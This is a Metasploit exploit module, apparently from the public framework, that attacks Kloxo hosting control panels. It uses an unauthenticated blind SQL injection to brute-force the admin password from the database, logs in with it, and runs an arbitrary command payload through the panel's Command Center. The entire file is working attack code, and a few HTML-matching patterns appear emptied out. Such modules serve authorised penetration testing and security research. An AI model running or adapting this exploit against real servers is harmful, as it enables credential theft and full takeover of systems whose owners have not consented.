## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper Rank = ManualRanking PASSWORD_PREFIX = '__lxen:' BASE64_RANGE = Rex::Text::AlphaNumeric + '+/=' attr_accessor :password attr_accessor :session attr_accessor :server def initialize(info = {}) super(update_info(info, 'Name' => 'Kloxo SQL Injection and Remote Code Execution', 'Description' => %q{ This module exploits an unauthenticated SQL injection vulnerability affecting Kloxo, as exploited in the wild on January 2014. The SQL injection issue can be abused in order to retrieve the Kloxo admin cleartext password from the database. With admin access to the web control panel, remote PHP code execution can be achieved by abusing the Command Center function. The module tries to find the first server in the tree view, unless the server information is provided, in which case it executes the payload there. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Discovery, exploit in the wild 'juan vazquez' # Metasploit Module ], 'References' => [ ['URL', 'https://vpsboard.com/topic/3384-kloxo-installations-compromised/'], # kloxo exploited in the wild ['URL', 'http://www.webhostingtalk.com/showthread.php?p=8996984'], # kloxo exploited in the wild ['URL', 'http://forum.lxcenter.org/index.php?t=msg&th=19215&goto=102646'] # patch discussion ], 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'Space' => 262144, # 256k 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl python gawk netcat' } }, 'Targets' => [ ['Kloxo / CentOS', {}] ], 'Privileged' => true, 'DisclosureDate' => 'Jan 28 2014', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(7778), OptString.new('TARGETURI', [true, 'The URI of the Kloxo Application', '/']) ]) register_advanced_options( [ OptString.new('SERVER_CLASS', [false, 'The server class']), OptString.new('SERVER_NAME', [false, 'The server name']) ]) end def check return Exploit::CheckCode::Safe unless webcommand_exists? return Exploit::CheckCode::Safe if exploit_sqli(1, bad_char(0)) return Exploit::CheckCode::Safe unless pefix_found? Exploit::CheckCode::Vulnerable end def exploit fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited") unless check == Exploit::CheckCode::Vulnerable print_status("Recovering the admin password with SQLi...") loot = base64_password fail_with(Failure::Unknown, "#{peer} - Failed to exploit the SQLi...") if loot.nil? @password = Rex::Text.decode_base64(loot) print_good("Password recovered: #{@password}") print_status("Logging into the Control Panel...") @session = send_login fail_with(Failure::NoAccess, "#{peer} - Login with admin/#{@password} failed...") if @session.nil? store_valid_credential(user: 'admin', private: @password) print_status("Retrieving the server name...") @server = server_info fail_with(Failure::NoAccess, "#{peer} - Login with admin/#{Rex::Text.decode_base64(base64_password)} failed...") if @server.nil? print_status("Exploiting...") send_command(payload.encoded) end def send_login res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.to_s, 'htmllib', 'phplib', ''), 'vars_post' => { 'frm_clientname' => 'admin', 'frm_password' => @password, 'login' => 'Login' } ) if res && res.code == 302 && res.headers.include?('Set-Cookie') return res.get_cookies end nil end def server_info unless datastore['SERVER_CLASS'].blank? || datastore['SERVER_NAME'].blank? return { :class => datastore['SERVER_CLASS'], :name => datastore['SERVER_NAME'] } end res = send_request_cgi({ 'uri' => normalize_uri(target_uri.to_s, 'display.php'), 'cookie' => @session, 'vars_get' => { 'frm_action' => 'show' } }) if res && res.code == 200 && res.body.to_s =~ // return parse_display_info(res.body.to_s) end nil end def parse_display_info(html) server_info = {} pos = html.index(//) if html.index(//, pos).nil? return nil else server_info[:class] = $1 end if html.index(/ /, pos).nil? return nil else server_info[:name] = $1 end server_info end def send_command(command) data = Rex::MIME::Message.new data.add_part(@server[:class], nil, nil, 'form-data; name="frm_o_o[0][class]"') data.add_part(@server[:name], nil, nil, 'form-data; name="frm_o_o[0][nname]"') data.add_part(command, nil, nil, 'form-data; name="frm_pserver_c_ccenter_command"') data.add_part('', nil, nil, 'form-data; name="frm_pserver_c_ccenter_error"') data.add_part('updateform', nil, nil, 'form-data; name="frm_action"') data.add_part('commandcenter', nil, nil, 'form-data; name="frm_subaction"') data.add_part('Execute', nil, nil, 'form-data; name="frm_change"') post_data = data.to_s send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path.to_s, 'display.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'cookie' => @session, 'data' => post_data }, 1) end def webcommand_exists? res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'lbin', 'webcommand.php')) if res && res.code == 200 && res.body.to_s =~ /__error_only_clients_and_auxiliary_allowed_to_login/ return true end false end def pefix_found? i = 1 PASSWORD_PREFIX.each_char do |c| return false unless exploit_sqli(i, c) i = i + 1 end true end def bad_char(pos) Rex::Text.rand_text_alpha(1, PASSWORD_PREFIX[pos]) end def ascii(char) char.unpack('C')[0] end def base64_password i = PASSWORD_PREFIX.length + 1 loot = '' until exploit_sqli(i, "\x00") vprint_status("Brute forcing position #{i}") c = brute_force_char(i) if c.nil? return nil else loot << c end vprint_status("Found: #{loot}") i = i + 1 end loot end def brute_force_char(pos) BASE64_RANGE.each_char do |c| return c if exploit_sqli(pos, c) end nil end def exploit_sqli(pos, char) # $1$Tw5.g72.$/0X4oceEHjGOgJB/fqRww/ == crypt(123456) sqli = "al5i' " sqli << "union select '$1$Tw5.g72.$/0X4oceEHjGOgJB/fqRww/' from client where " sqli << "ascii(substring(( select realpass from client limit 1),#{pos},1))=#{ascii(char)}#" res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.to_s, 'lbin', 'webcommand.php'), 'vars_get' => { 'login-class' => 'client', 'login-name' => sqli, 'login-password' => '123456' } ) if res && res.code == 200 && res.body.blank? return true elsif res && res.code == 200 && res.body.to_s =~ /_error_login_error/ return false end vprint_warning("Unknown fingerprint while exploiting SQLi... be careful") false end end